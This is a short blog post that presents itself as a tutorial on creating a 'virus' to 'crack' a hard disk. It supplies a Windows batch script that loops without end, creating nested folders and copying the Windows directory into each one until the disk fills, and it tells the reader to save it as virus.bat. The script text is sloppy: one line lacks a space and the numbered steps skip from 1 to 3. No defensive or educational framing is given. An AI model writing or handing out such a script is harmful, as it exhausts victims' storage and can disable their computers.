Showing posts with label viruses. Show all posts
Showing posts with label viruses. Show all posts

Sunday, 13 March 2011

Create a virus which can crack a user's harddisk

RELATED POSTS:

1.Create a virus to make folder into a folder and so on...

2.Create an invisible folder

__________________________________________________________________________________________________

To create such a virus there is just a need of few line coding,follow the below steps:

1.Open notepad and type the following code

:123

mkdir engineersworld

copy C:\windows\*.*engineersworld\*.*

cd engineersworld

goto 123

3.now save as to virus .bat on desktop.

4.And thats your virus....

5.For much advancement in this refer to our previous post.